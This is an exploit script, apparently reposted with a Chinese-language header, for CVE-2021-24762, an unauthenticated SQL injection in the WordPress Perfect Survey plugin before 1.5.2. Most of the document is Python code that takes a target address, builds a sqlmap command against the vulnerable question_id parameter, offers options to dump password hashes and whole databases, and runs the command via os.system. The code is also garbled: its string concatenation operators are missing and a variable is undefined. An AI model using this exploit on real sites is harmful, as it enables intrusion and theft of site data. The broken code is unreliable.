# 版本:< 1.5.2
# 测试:Ubuntu 20.04
# CVE: CVE-2021-24762
# CWE: CWE-89
# 文档: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24762/README.md
'''
描述:
WordPress 完美调查1.5.2 之前的插件不验证和转义之前的 question_id GET 参数
在 get_question AJAX 操作中的 SQL 语句中使用它,允许未经身份验证的用户执行 SQL 注入。
'''
代码语言:javascript复制print(banner)
import argparse
from datetime import datetime
import os
# User-Input:
my_parser = argparse.ArgumentParser(description= 'Perfect Survey - SQL-Injection (unauthenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
print('[*] Starting Exploit at: ' str(datetime.now().strftime('%H:%M:%S')))
print('[*] Payload for SQL-Injection:')
exploitcode_url = r'sqlmap "http://' target_ip ':' target_port wp_path r'wp-admin/admin-ajax.php?action=get_question&question_id=1 *" '
print(' Sqlmap options:')
print(' -a, --all Retrieve everything')
print(' -b, --banner Retrieve DBMS banner')
print(' --current-user Retrieve DBMS current user')
print(' --current-db Retrieve DBMS current database')
print(' --passwords Enumerate DBMS users password hashes')
print(' --tables Enumerate DBMS database tables')
print(' --columns Enumerate DBMS database table column')
print(' --schema Enumerate DBMS schema')
print(' --dump Dump DBMS database table entries')
print(' --dump-all Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url retrieve_mode ' --answers="follow=Y" --batch -v 0'
os.system(exploitcode)
print('Exploit finished at: ' str(datetime.now().strftime('%H:%M:%S')))
